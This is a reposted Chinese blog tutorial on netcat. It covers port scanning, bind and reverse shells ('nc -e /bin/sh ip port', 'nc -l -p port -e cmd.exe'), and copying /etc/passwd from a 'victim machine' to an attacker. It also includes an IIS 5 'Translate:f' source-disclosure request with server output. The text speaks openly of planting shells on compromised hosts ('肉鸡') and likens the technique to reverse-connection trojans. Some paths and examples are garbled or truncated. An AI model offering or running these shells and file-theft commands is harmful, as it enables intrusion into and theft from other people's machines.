zoukankan      html  css  js  c++  java
  • [转载]nc命令详解

    最近在搞反向连接,试来试去发现最好的工具还是nc。正好趁这个机会把nc的用法总结一下:
    
    1.端口扫描:
      nc -vv ip port
      例:nc -vv 192.168.1.1 5000 扫描192.168.1.1的tcp 5000端口
      nc -vv -w secs ip port-port
      例:nc -vv -w 5 192.168.1.1 5000-5002 扫描192.168.1.1的5000-5002端口,网络超时的时间设为5秒。
      
    2.开设后门:
      victim machine:
      nc -l -p port -e cmd.exe //windows
      nc -l -p port -e /bin/sh //*nix
      attack machine:
      nc ip port
    
    3.反向连接
      victim machine:
      nc -e cmd.exe ip port //windows
      nc -e /bin/sh ip port //*nix
      attack machine:
      nc -vv -l -p port
    
    4.传送文件
      从victim machine上拉文件下来:
      victim machine:
      nc attack_ip port <  /etc/passwd
      attacker machine:
      nc -d -l -p  port  >  tmp
    
      从attack machine上下载文件:
      attacker machine:
      nc -d -l -p port < tmp
      victim machine:
      nc attack_ip port > tmp
    
    
    需要注意的地方:
    linux安装时往往自带了netcat,命令名为nc。但是可能是为了安全原因,去掉了-e参数。如果需要完全版本的netcat,需要到网上下载后,编译。 
    
    ``
    --- 
    
    

    netcat被誉为网络安全界的‘瑞士军刀’,相信没有什么人不认识它吧……
    一个简单而有用的工具,透过使用TCP或UDP协议的网络连接去读写数据。它被设计成一个稳定的后门工具,
    能够直接由其它程序和脚本轻松驱动。同时,它也是一个功能强大的网络调试和探测工具,能够建立你需要的几
    乎所有类型的网络连接,还有几个很有意思的内置功能(详情请看下面的使用方法)。
    nc命令详解
    Filed under: security — ranbo @ 9:08 pm
    netcat被誉为网络安全界的‘瑞士军刀’,相信没有什么人不认识它吧……
    一个简单而有用的工具,透过使用TCP或UDP协议的网络连接去读写数据。它被设计成一个稳定的后门工具,
    能够直接由其它程序和脚本轻松驱动。同时,它也是一个功能强大的网络调试和探测工具,能够建立你需要的几
    乎所有类型的网络连接,还有几个很有意思的内置功能(详情请看下面的使用方法)。
    在中国,它的WINDOWS版有两个版本,一个是原创者Chris Wysopal写的原版本,另一个是由‘红与黑’编译
    后的新‘浓缩’版。‘浓缩’版的主程序只有10多KB(10多KB的NC是不能完成下面所说的第4、第5种使用方法,
    有此功能的原版NC好象要60KB:P),虽然”体积”小,但很完成很多工作。
    一、基本使用
    想要连接到某处: nc [-options] hostname port[s] [ports] …
    绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
    参数:
    -e prog 程序重定向,一旦连接,就执行 [危险!!]
    -g gateway source-routing hop point[s], up to 8
    -G num source-routing pointer: 4, 8, 12, …
    -h 帮助信息
    -i secs 延时的间隔
    -l 监听模式,用于入站连接
    -n 指定数字的IP地址,不能用hostname
    -o file 记录16进制的传输
    -p port 本地端口号
    -r 任意指定本地及远程端口
    -s addr 本地源地址
    -u UDP模式
    -v 详细输出——用两个-v可得到更详细的内容
    -w secs timeout的时间
    -z 将输入输出关掉——用于扫描时
    其中端口号可以指定一个或者用lo-hi式的指定范围。
    例如:扫描端口
    tcp扫描
    C:nc>nc -v -z -w2 192.168.0.80 1-140
    net [192.168.0.80] 140 (?)
    net [192.168.0.80] 139 (netbios-ssn) open
    net [192.168.0.80] 138 (?)
    net [192.168.0.80] 137 (netbios-ns)
    net [192.168.0.80] 136 (?)
    net [192.168.0.80] 135 (epmap) open
    net [192.168.0.80] 81 (?) open
    net [192.168.0.80] 80 (http) open
    net [192.168.0.80] 79 (finger)
    net [192.168.0.80] 25 (smtp) open
    net [192.168.0.80] 24 (?)
    net [192.168.0.80] 23 (telnet)
    net [192.168.0.80] 21 (ftp)
    udp扫描
    C:nc>nc -u -v -z -w2 192.168.0.80 1-140
    net [192.168.0.80] 140 (?) open
    net [192.168.0.80] 139 (?) open
    net [192.168.0.80] 138 (netbios-dgm) open
    net [192.168.0.80] 137 (netbios-ns) open
    net [192.168.0.80] 54 (?) open
    net [192.168.0.80] 53 (domain) open
    net [192.168.0.80] 38 (?) open
    net [192.168.0.80] 37 (time) open
    net [192.168.0.80] 7 (echo) open
    二、高级应用
    1.IE的MIME欺骗
    这个网站目录提供了黑客的n关,过了这n关证明你开始入门了。我做的
    http://www.try2hack.nl
    的国产版。
    这个页面告诉我们的浏览器不是 IE6.72,我们的作系统不是LIUNX,我们不是从
    www.microsoft.com/ms.htm
    重定向链接过去的,linux有 IE6.72? 微软会在它的页面上放
    http://www.try2hack.nl/cgi-bin/level7.pl
    的链接?
    nc 221.10.222.34 80
    GET /level/level7.php HTTP/1.1
    Accept:image/gif,image/x-xbitmap,application/msword,
    /*
    Referer:http://www.microsoft.com/ms.htm
    Accept-Language:zh-cn
    Accept-Encodeing:gzip,deflate
    User-Agent:Mozilla/4.0 (compatible;MSIE6.72;Linux i686)
    Host:221.10.222.34
    Connection:Keep-Alive
    2.IIS 5 “Translate:f” 显示代码脆弱点
    Translate:f脆弱点的机制:发送一个畸形的HTTP GET 请求给服务器方一个可执行脚本或相关文件类型(例如.ASP或者global.asa)。这些文件是用于服务器上运行的,绝不会到客户机上去,而这个请求就会导致IIS将这种文件的内容发送到远端的客户机上,而不是在服务器上运行。这种畸形的HTTP GET请求的关键特性是该请求的末尾有一个特定的头信息Translate:f,并有一个反斜杠””附于URL之后。下面就有这样的一个例子([CRLF]代表回车字符)
    注意 GET global.asa 后的反斜杠以及Translate:f头信息。
    GET /global.asa HTTP/1.0
    Host:192.168.0.1
    User-Agent:SensePostData
    Content-Type:application/x-www-form-urlencoded
    Translate:f
    [CRLF]
    [CRLF]
    将以上内容保存在一个文本文件中(例如example.txt)
    然后向一个有这个漏洞的服务器发送
    c:>type example.txt | nc –nvv 192.168.0.80 80
    (UNKNOWN) [192.168.0.80] 80 (?) open
    HTTP/1.1 200 OK
    Server: Microsoft-IIS/5.0
    Date: Tue, 03 Dec 2002 08:50:46 GMT
    Content-Type: application/octet-stream
    Content-Length: 2790
    ETag: “0448299fcd6df1:bea”
    Last-Modified: Wed, 13 Nov 2002 18:50:46 GMT
    Accept-Ranges: bytes
    Cache-Control: no-cache
    举例:
    1)连接到REMOTE主机,例子:
    格式:nc -nvv 192.168.x.x 80
    讲解:连到192.168.x.x的TCP80端口
    2)监听LOCAL主机,例子:
    格式:nc -l -p 80
    讲解:监听本机的TCP80端口
    3)扫描远程主机,例子:
    格式:nc -nvv -w2 -z 192.168.x.x 80-445
    讲解:扫描192.168.x.x的TCP80到TCP445的所有端口
    4)REMOTE主机绑定SHELL,例子:
    格式:nc -l -p 5354 -t -e c:winntsystem32cmd.exe
    讲解:绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口
    5)REMOTE主机绑定SHELL并反向连接,例子:
    格式:nc -t -e c:winntsystem32cmd.exe 192.168.x.x 5354
    讲解:绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口
    以上为最基本的几种用法(其实NC的用法还有很多,
    当配合管道命令”|”与重定向命令”“等等命令功能更强大……)。

    高级用法:
    6)作攻击程序用,例子:
    格式1:type.exe c:exploit.txt|nc -nvv 192.168.x.x 80
    格式2:nc -nvv 192.168.x.x 80 c:log.txt
    讲解:使用’-L’可以不停地监听某一个端口,直到ctrl+c为止,同时把结果输出到’c:log.txt’中,如果把‘>’
    改为‘>>’即可以追加日志
    附:’c:log.txt’为日志等
    9)作蜜罐用[3],例子:
    格式1:nc -L -p 80 e:log.dat
    nc -l -v -p port
    参数解释:
    -l:监听端口,监听入站信息
    -p:后跟本地端口号
    -v:显示端口的信息,如果使用-vv的话,则会显示端口更详细的信息
    提示:一般大家都爱用-vv
    nc -l -p 80
    这个很简单,监听80端口
    如果机器上运行这个命令,端口80被认为是开放的,可以欺骗很多扫描器的哦!
    nc -l -p 80 > e:log.dat
    呵呵,功能和上边一样,但是后边加了个“> e:log.dat”我想,学过ECHO
    那个命令的人都会知道吧,是在E盘创建一个log.dat的日志文件
    nc -l -v -p 80
    和上边命令相似,不过这次不是记录在文件里,而是会直接显示在运行着NC
    的屏幕上。
    呵呵,讲了这么多,来实践下
    nc -l -v -p 80
    然后在浏览器中输入本机IP:127.0.0.1
    呵呵,看到什么?
    同样,上边两个也是一样,大家自己试验一下吧
    命令2:程序定向
    nc -l -p port -t -e cmd.exe
    本地机: nc -l -p port 或 nc -l -v -p port
    目标机:nc -e cmd.exe ip port
    参数解释:
    -l、-p两个参数已经解释过了
    -e;作用就是程序定向
    -t:以telnet的形式来应答
    例子
    nc -l -p 5277 -t -e cmd.exe
    知道运行在哪里吗?千万不要运行在自己的机器上,如果运行了,你机器
    就会变成一台TELNET的服务器了,呵呵,解释一下:监听本地端口5277的
    入站信息,同时将CMD.exe这个程序,重定向到端口5277上,当有人连接的时候,就让程序CMD.exe以TELNET的形式来响应连接要求。
    说白了,其实就是让他成为一台TELNET的肉鸡,所以这个命令要运行在你的肉鸡上。。(话外音:说这么多遍当我们白痴啊,快往下讲!!!)
    呵呵,咱们来找台肉鸡试试,我TELNET IP 5277
    HOHO如何?
    local machine:nc -l -p port ( or nc -l -v -p port )
    remote machine:nc -e cmd.exe ip port
    大家知道灰鸽子和神偷吧,这两款工具都是利用了反弹端口型的木马,
    什么叫反弹端口?就是说,当对方中马后,不用你主动和对方连接,也就是说
    不用从你的client端向对方主机上运行的server端发送请求连接,而是对方主动来连接你
    这样就可以使很多防火墙失效,因为很多防火墙都不检查出站请求的。
    这里这两个命令结合在一起后,于那两款木马可以说有异曲同工之效。为什么?
    咳!!听我给你讲啊!!(先交100000000RMB学费)哇,别杀我啊!!)
    nc -l -p 5277 (坚听本地5277端口)
    同样也可以用
    nc -l -v -p 5277
    运行在本地
    然后在远程机器上,想办法运行
    nc -e cmd.exe ip 5277
    (你可别真的打“ip”在肉机上啊)要打,xxx.xxx.xxx.xxx这样!!
    呵呵,看看在本地机器上出现了什么?
    这样就是反弹
    在本地机器上得到了一个SHELL
    命令3:扫描端口
    nc -v ip port
    nc -v -z ip port-port
    nc -v -z -u ip port-port
    参数解释:
    -z:将输入输出关掉,在扫描时使用
    nc -v ip port
    这个命令是针对某一个端口进行扫描
    例如:
    nc -v ip 135
    扫描远程主机的135端口,这样获得了该端口的一些简单信息,但是针对某些端口,我们还可以获得更多的信息
    例如:80端口
    我们可以使用nc -v ip 80 然后使用get方法来获得对方的WEB服务器的信息
    nc -v -z ip port-port
    这个命令是用来扫描的一个命令,这个命令用于快速扫描TCP端口,而port-port则是指定了扫描的端口范围
    例如:
    nc -v -z ip 1-200
    可以看到我机器上的1-200的TCP端口的开放情况
    nc -v -z -u ip port-port
    这个命令比上个命令多了个-u,这个命令的作用仍然是扫描端口,只是多了一个-u的参数,是用来扫UDP端口的
    例如:
    nc -v -z -u ip 1-200
    这个命令就会扫1-200的UDP端口
    命令4:传送文件(HOHO,I LIKE)
    LOCAL MACHINE:nc -v -n ip port y:svr.exe
    参数解释:
    -n:指定数字的IP地址
    这两个命令结合起来是用来传送文件的
    首先,在远程机上运行命令:
    nc -v -l -p 5277 > c:pulist.exe
    这个命令还记的吗?呵呵,是不是和监听命令有点类似,对,没错,这个是监听5277端口
    并把接受到的信息数据写到c:pulist.exe中
    这时候在本地机上运行
    nc -v -n ip 5277

    本文来自ChinaUnix博客,如果查看原文请点:http://blog.chinaunix.net/u1/59178/showart_1296797.html

  • 相关阅读:
    The Future of Middleware and the BizTalk Roadmap
    FW: How to spawn a process that runs under the context of the impersonated user in Microsoft ASP.NET pages
    Strips illegal Xml characters
    luogu P2280 激光炸弹(二维前缀和)
    luogu P2704 炮兵阵地(经典状态压缩DP)
    SP1716 GSS3 Can you answer these queries III (线段树维护最大连续子段和)
    二分图判定、匹配问题
    C++语法综合 | 基于char*设计一个字符串类MyString
    luogu P1044 火车进出栈问题(Catalan数)
    C++设计模式 | 三种设计模式基础
  • 原文地址:https://www.cnblogs.com/deen-/p/7237202.html
Copyright © 2011-2022 走看看